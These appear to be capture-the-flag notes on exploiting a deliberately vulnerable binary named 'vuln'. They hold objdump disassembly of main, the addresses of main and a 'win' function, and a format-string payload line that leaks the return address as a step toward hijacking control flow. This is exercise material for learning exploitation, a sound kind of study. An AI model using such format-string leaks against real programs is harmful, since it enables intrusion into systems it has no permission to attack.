# find main layout with `objdump -d --disassemble=main vuln`
```assembly
0000000000001400 <main>:
    1400:	f3 0f 1e fa          	endbr64
    1404:	55                   	push   %rbp
    1405:	48 89 e5             	mov    %rsp,%rbp
    1408:	48 8d 35 9a fe ff ff 	lea    -0x166(%rip),%rsi        # 12a9 <segfault_handler>
    140f:	bf 0b 00 00 00       	mov    $0xb,%edi
    1414:	e8 57 fd ff ff       	call   1170 <signal@plt>
    1419:	48 8b 05 f0 2b 00 00 	mov    0x2bf0(%rip),%rax        # 4010 <stdout@GLIBC_2.2.5>
    1420:	b9 00 00 00 00       	mov    $0x0,%ecx
    1425:	ba 02 00 00 00       	mov    $0x2,%edx
    142a:	be 00 00 00 00       	mov    $0x0,%esi
    142f:	48 89 c7             	mov    %rax,%rdi
    1432:	e8 49 fd ff ff       	call   1180 <setvbuf@plt>
    1437:	b8 00 00 00 00       	mov    $0x0,%eax
    143c:	e8 86 fe ff ff       	call   12c7 <call_functions>
    1441:	b8 00 00 00 00       	mov    $0x0,%eax
    1446:	5d                   	pop    %rbp
    1447:	c3                   	ret
```
# find `main` and `win` locations
```
000000000000136a g     F .text	0000000000000096              win
0000000000001400 g     F .text	0000000000000048              main
```
# find buffer offset to read return address into `main` via gdb
- %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx
- return value $\leftrightarrow$ *main+65 after dot